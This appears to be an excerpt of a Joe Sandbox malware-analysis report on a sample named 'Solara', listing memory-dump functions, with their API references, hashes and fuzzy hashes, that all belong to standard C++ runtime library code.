DName::DName.LIBVCRUNTIME ref: 00C5BBEC

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: Decorator::getDimensionSigned$Name::operator+$NameName::$swprintf
String ID:
API String ID: 3689813335-0
Opcode ID: 2e989f6f4d6642f7be11130945a2ee42d6d47b212310a1033e4146200ea0083b
Instruction ID: 64dcc160dd7720cff67b8ea5243d91d6a133532a1afad7f0e2bec34e43379e6d
Opcode Fuzzy Hash: 2e989f6f4d6642f7be11130945a2ee42d6d47b212310a1033e4146200ea0083b
Instruction Fuzzy Hash: A891C8B9C0420A9ACB14EFB5C99AAFE7F78AF04302F204516F911A6191DB749FCCD758

Function 00C8A54C Relevance: 14.5, APIs: 1, Strings: 7, Instructions: 487COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 00C8A924

Strings

p, xrefs: 00C8A6AB
p, xrefs: 00C8A649
f, xrefs: 00C8A65E
f, xrefs: 00C8A642
p, xrefs: 00C8A665
:, xrefs: 00C8A617
f, xrefs: 00C8A6A4

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: __aulldiv
String ID: :$f$f$f$p$p$p
API String ID: 3732870572-1434680307
Opcode ID: f206ba3e5f4a0c66a684780045d84a2288f9aabcae7469bca604b464bd5ea39c
Instruction ID: 2f24d5e842f4f40e7d02b247c25c88c0aaffa1aba4ca28ad6c1d46d25982dfa9
Opcode Fuzzy Hash: f206ba3e5f4a0c66a684780045d84a2288f9aabcae7469bca604b464bd5ea39c
Instruction Fuzzy Hash: 5802AF359002099BEF24AF65C5446EDB772FF00B1CFA48117E4257B280D7349E86DB6E

Function 00C54D36 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 00C54E55
___TypeMatch.LIBVCRUNTIME ref: 00C54F63
CatchIt.LIBVCRUNTIME ref: 00C54FB4
CallUnexpected.LIBVCRUNTIME ref: 00C550D0

Strings

csm, xrefs: 00C54E8C
csm, xrefs: 00C54D73
csm, xrefs: 00C54DE0

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: CallCatchMatchTypeUnexpectedtype_info::operator==
String ID: csm$csm$csm
API String ID: 2356445960-393685449
Opcode ID: ca56c441fc42f1086d8d567632cdfdd50b4720a92a9c3d8984b6abf261c4e0d4
Instruction ID: e5053287230a3dceb35bd7d800ba57b4164744f2f88c43433cf0c4724efddaf7
Opcode Fuzzy Hash: ca56c441fc42f1086d8d567632cdfdd50b4720a92a9c3d8984b6abf261c4e0d4
Instruction Fuzzy Hash: 0BB1BB39800209EFCF18DFA4C8819AEBBB5FF44316F144159EC256B252D331DAD9DB99

Function 00C90CB6 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 298COMMONLIBRARYCODE

Download Yara Rule

Strings

, xrefs: 00C90F2F

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3907804496
Opcode ID: 9986b53a0c2e40475183fa1a71e9a6e9291be2ce6e87f4cc46c58a23015e6f05
Instruction ID: 78d5dfd1f0addcec7cd8ea1f436496d21432a0666481b0379ad136d5ba78f027
Opcode Fuzzy Hash: 9986b53a0c2e40475183fa1a71e9a6e9291be2ce6e87f4cc46c58a23015e6f05
Instruction Fuzzy Hash: B2B12670A04249AFDF21DFD9C889BBE7BB1BF45300F248258E955A7392C7719E42CB61

Function 00C4185F Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00C41866
_Maklocstr.LIBCPMT ref: 00C418CD
_Maklocstr.LIBCPMT ref: 00C418DF
_Maklocchr.LIBCPMT ref: 00C418F7
_Maklocchr.LIBCPMT ref: 00C41907

Strings

true, xrefs: 00C418DA
false, xrefs: 00C418C8

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: MaklocchrMaklocstr$H_prolog3_
String ID: false$true
API String ID: 2404127365-2658103896
Opcode ID: a97434da445ef1455bb2eb58a92e6b31e648a9670c110319c5ba33835b002222
Instruction ID: 93d0da219645f1815f246dc6f1755bc7dc00d7f1e7c793aca991823eb68f222e
Opcode Fuzzy Hash: a97434da445ef1455bb2eb58a92e6b31e648a9670c110319c5ba33835b002222
Instruction Fuzzy Hash: 83217AB5C00344AADF14EFA1D88599BBBB8FF45700F04855AF8159F252EA70D644DF60

Function 00C2AA32 Relevance: 10.7, APIs: 7, Instructions: 189COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C2AA39
int.LIBCPMT ref: 00C2AA54

Part of subcall function 00C2191F: std::_Lockit::_Lockit.LIBCPMT ref: 00C21930
Part of subcall function 00C2191F: std::_Lockit::~_Lockit.LIBCPMT ref: 00C2194A

int.LIBCPMT ref: 00C2AAB9
int.LIBCPMT ref: 00C2AAFE
int.LIBCPMT ref: 00C2AB41
int.LIBCPMT ref: 00C2ABB2
_Yarn.LIBCPMT ref: 00C2AC30

Part of subcall function 00C21AF8: __Getctype.LIBCPMT ref: 00C21B07

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: Lockitstd::_$GetctypeH_prolog3Lockit::_Lockit::~_Yarn
String ID:
API String ID: 3817491809-0
Opcode ID: 8dc5db255ca6f1da886ce794c56f238d557fca3c122e669c9ecf275908375a6d
Instruction ID: 5f92b61e501d06958c88a9a6a3a0e2a809a72d612a1c0057f78e75fd98056fd7
Opcode Fuzzy Hash: 8dc5db255ca6f1da886ce794c56f238d557fca3c122e669c9ecf275908375a6d
Instruction Fuzzy Hash: 0D5106B1800236ABDB10BF65AD46A7F7BB9FF11310F044029F915A7A42DB708A40F7A3

Function 00C57C87 Relevance: 10.7, APIs: 7, Instructions: 151COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBCMT ref: 00C57D15
DName::operator+.LIBCMT ref: 00C57D68

Part of subcall function 00C567BE: shared_ptr.LIBCMT ref: 00C567DA

Part of subcall function 00C566AD: DName::operator+.LIBCMT ref: 00C566CE

DName::operator+.LIBCMT ref: 00C57D59
DName::operator+.LIBCMT ref: 00C57DB9
DName::operator+.LIBCMT ref: 00C57DC6
DName::operator+.LIBCMT ref: 00C57E0D
DName::operator+.LIBCMT ref: 00C57E1A

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: Name::operator+$shared_ptr
String ID:
API String ID: 1037112749-0
Opcode ID: 8084b4e47bf14e4100ba6e44a7134e43ae17b3d865b626439f6cdc5ce8df08a9
Instruction ID: 4837303e73ea1f51fec1c2f749c8c899e5657819dd91eab6f0d6d6a5c4718d09
Opcode Fuzzy Hash: 8084b4e47bf14e4100ba6e44a7134e43ae17b3d865b626439f6cdc5ce8df08a9
Instruction Fuzzy Hash: 275186B9D04218ABDF15DB94D845EFEBBB8EF08301F54415AF901A7181DB709ACCDBA4

Function 00C54500 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00C54537
___except_validate_context_record.LIBVCRUNTIME ref: 00C5453F
_ValidateLocalCookies.LIBCMT ref: 00C545C8
__IsNonwritableInCurrentImage.LIBCMT ref: 00C545F3
_ValidateLocalCookies.LIBCMT ref: 00C54648

Strings

csm, xrefs: 00C545DD

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: b306b47e3f3c47525257fd14c91b3acf545b71fe33dfa018356017b980f9b2f9
Instruction ID: f02a30a4941ed24353c7120d0b9f77a95e74a4abc9463107b7cfc0d210391ed0
Opcode Fuzzy Hash: b306b47e3f3c47525257fd14c91b3acf545b71fe33dfa018356017b980f9b2f9
Instruction Fuzzy Hash: 1B41D238A002089FCF04DF68C884A9EBBB1AF4531DF548155EC14AB292D731EED9CF94

Function 00C41786 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00C4178D
_Maklocstr.LIBCPMT ref: 00C417F6
_Maklocstr.LIBCPMT ref: 00C41808
_Getvals.LIBCPMT ref: 00C41852

Strings

true, xrefs: 00C41803
false, xrefs: 00C417F1

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: Maklocstr$GetvalsH_prolog3_
String ID: false$true
API String ID: 1611767717-2658103896
Opcode ID: 69213f1ead1512569c21180c2ef9c20eb0c97d12e7e1f5169e334097d6634e18
Instruction ID: d4738d97f9aff3d4b69ae9e3b7ab8356cd9764202a00b8c71def67229fa1b168
Opcode Fuzzy Hash: 69213f1ead1512569c21180c2ef9c20eb0c97d12e7e1f5169e334097d6634e18
Instruction Fuzzy Hash: 532162B1D00318ABDF14EFA5E885ADFBBA8FF05750F04815AF9189F152DBB08644DBA1

Function 00C29E73 Relevance: 10.6, APIs: 7, Instructions: 70COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C29E7A
std::_Lockit::_Lockit.LIBCPMT ref: 00C29E84
int.LIBCPMT ref: 00C29E9B

Part of subcall function 00C2191F: std::_Lockit::_Lockit.LIBCPMT ref: 00C21930
Part of subcall function 00C2191F: std::_Lockit::~_Lockit.LIBCPMT ref: 00C2194A

numpunct.LIBCPMT ref: 00C29EBE
std::_Facet_Register.LIBCPMT ref: 00C29ED5
std::_Lockit::~_Lockit.LIBCPMT ref: 00C29EF5
Concurrency::cancel_current_task.LIBCPMT ref: 00C29F02

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registernumpunct
String ID:
API String ID: 3064348918-0
Opcode ID: dc06b116a5a11d0e8fb78dc999f28b4b8cbd044af286c3a312e76b1d78185b56
Instruction ID: 654a3e45e61c2d082f9de54476dec35691ae347da103c2760e3d3865cf72e06e
Opcode Fuzzy Hash: dc06b116a5a11d0e8fb78dc999f28b4b8cbd044af286c3a312e76b1d78185b56
Instruction Fuzzy Hash: 89113636900235ABCB00EBA4E811BAEB7B5EF84330F148419F91197B91CF719E41D7E1

Function 00C24C88 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C24C8F
std::_Lockit::_Lockit.LIBCPMT ref: 00C24C99
int.LIBCPMT ref: 00C24CB0

Part of subcall function 00C2191F: std::_Lockit::_Lockit.LIBCPMT ref: 00C21930
Part of subcall function 00C2191F: std::_Lockit::~_Lockit.LIBCPMT ref: 00C2194A

codecvt.LIBCPMT ref: 00C24CD3
std::_Facet_Register.LIBCPMT ref: 00C24CEA
std::_Lockit::~_Lockit.LIBCPMT ref: 00C24D0A
Concurrency::cancel_current_task.LIBCPMT ref: 00C24D17

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercodecvt
String ID:
API String ID: 2133458128-0
Opcode ID: 9cef119f129ce54be326e9521de3d249a1c0dfa4ba6dec9d8426b9f455c82f65
Instruction ID: dd75d306cfc970b5a62748f4348bde7e785002b0b6c6d726832e43746b900164
Opcode Fuzzy Hash: 9cef119f129ce54be326e9521de3d249a1c0dfa4ba6dec9d8426b9f455c82f65
Instruction Fuzzy Hash: 5611D371900639ABCF08BBA8E802BAE7BB5EF44720F144019F804AB791DF709E41DBD0

Function 00C4A46C Relevance: 10.5, APIs: 7, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C4A473
std::_Lockit::_Lockit.LIBCPMT ref: 00C4A47D
int.LIBCPMT ref: 00C4A494

Part of subcall function 00C2191F: std::_Lockit::_Lockit.LIBCPMT ref: 00C21930
Part of subcall function 00C2191F: std::_Lockit::~_Lockit.LIBCPMT ref: 00C2194A

messages.LIBCPMT ref: 00C4A4B7
std::_Facet_Register.LIBCPMT ref: 00C4A4CE
std::_Lockit::~_Lockit.LIBCPMT ref: 00C4A4EE
Concurrency::cancel_current_task.LIBCPMT ref: 00C4A4FB

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermessages
String ID:
API String ID: 958335874-0
Opcode ID: b200d36dcba031b41f897b7dea2c3ecccfeeb941d5016743896ae3b2fe5f3633
Instruction ID: 45f2424a60f1c6c99ec919b56e8fc184b68dd75ff127c2adaf6f7f3c80257553
Opcode Fuzzy Hash: b200d36dcba031b41f897b7dea2c3ecccfeeb941d5016743896ae3b2fe5f3633
Instruction Fuzzy Hash: 3901F5359002259BCF05FBA4E816AFE77B1FF94310F148408F911AB791CF749E429B92

Function 00C4A6C0 Relevance: 10.5, APIs: 7, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C4A6C7
std::_Lockit::_Lockit.LIBCPMT ref: 00C4A6D1
int.LIBCPMT ref: 00C4A6E8

Part of subcall function 00C2191F: std::_Lockit::_Lockit.LIBCPMT ref: 00C21930
Part of subcall function 00C2191F: std::_Lockit::~_Lockit.LIBCPMT ref: 00C2194A

moneypunct.LIBCPMT ref: 00C4A70B
std::_Facet_Register.LIBCPMT ref: 00C4A722
std::_Lockit::~_Lockit.LIBCPMT ref: 00C4A742
Concurrency::cancel_current_task.LIBCPMT ref: 00C4A74F

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
String ID:
API String ID: 3376033448-0
Opcode ID: 9d10cdc60bb29edd37b4db82415859a1403e1ff12d5215a75ad22456e921fc7a
Instruction ID: 04b273f9d48b50f16896eb2153e84415e871482af38fb9b04949bc8ecd1c6d62
Opcode Fuzzy Hash: 9d10cdc60bb29edd37b4db82415859a1403e1ff12d5215a75ad22456e921fc7a
Instruction Fuzzy Hash: 6801C0359002259BCB04EBA4E856AAE7772BF84324F240108E910AB3D1DF749E81D791

Function 00C4A62B Relevance: 10.5, APIs: 7, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C4A632
std::_Lockit::_Lockit.LIBCPMT ref: 00C4A63C
int.LIBCPMT ref: 00C4A653

Part of subcall function 00C2191F: std::_Lockit::_Lockit.LIBCPMT ref: 00C21930
Part of subcall function 00C2191F: std::_Lockit::~_Lockit.LIBCPMT ref: 00C2194A

moneypunct.LIBCPMT ref: 00C4A676
std::_Facet_Register.LIBCPMT ref: 00C4A68D
std::_Lockit::~_Lockit.LIBCPMT ref: 00C4A6AD
Concurrency::cancel_current_task.LIBCPMT ref: 00C4A6BA

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
String ID:
API String ID: 3376033448-0
Opcode ID: 0d6c86d0072b7a4a64366bfbbd72b37dae3f28b7ff98f0b5fa20469d23ac72bf
Instruction ID: 31a47854958e22d63589bd66205b12e19faa36ec26a2ed5907e9d1185d227a5c
Opcode Fuzzy Hash: 0d6c86d0072b7a4a64366bfbbd72b37dae3f28b7ff98f0b5fa20469d23ac72bf
Instruction Fuzzy Hash: 2601D2399402259BCB04FBA4E812AEE7776BF94314F194109F911AB391DF309E069B91

Function 00C3C7DA Relevance: 10.5, APIs: 7, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C3C7E1
std::_Lockit::_Lockit.LIBCPMT ref: 00C3C7EB
ctype.LIBCPMT ref: 00C3C825
std::_Facet_Register.LIBCPMT ref: 00C3C83C
std::_Lockit::~_Lockit.LIBCPMT ref: 00C3C85C
Concurrency::cancel_current_task.LIBCPMT ref: 00C3C869
int.LIBCPMT ref: 00C3C802

Part of subcall function 00C2191F: std::_Lockit::_Lockit.LIBCPMT ref: 00C21930
Part of subcall function 00C2191F: std::_Lockit::~_Lockit.LIBCPMT ref: 00C2194A

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registerctype
String ID:
API String ID: 2958136301-0
Opcode ID: cf9d49a775f3490270b552e1aaaeb8a2f1bd32f3f061fba0fd71a356f06a01b5
Instruction ID: 56b593fcb4aa7de5d291d5bfdea7a88f8533c0fbcf1bd55783a977012aca1763
Opcode Fuzzy Hash: cf9d49a775f3490270b552e1aaaeb8a2f1bd32f3f061fba0fd71a356f06a01b5
Instruction Fuzzy Hash: CA01D2359002269BCB05FBA4E855AFDB7B1AF88714F184008E911AB7D1CF749E46A791

Function 00C3C86F Relevance: 10.5, APIs: 7, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C3C876
std::_Lockit::_Lockit.LIBCPMT ref: 00C3C880
int.LIBCPMT ref: 00C3C897

Part of subcall function 00C2191F: std::_Lockit::_Lockit.LIBCPMT ref: 00C21930
Part of subcall function 00C2191F: std::_Lockit::~_Lockit.LIBCPMT ref: 00C2194A

messages.LIBCPMT ref: 00C3C8BA
std::_Facet_Register.LIBCPMT ref: 00C3C8D1
std::_Lockit::~_Lockit.LIBCPMT ref: 00C3C8F1
Concurrency::cancel_current_task.LIBCPMT ref: 00C3C8FE

Memory Dump Source

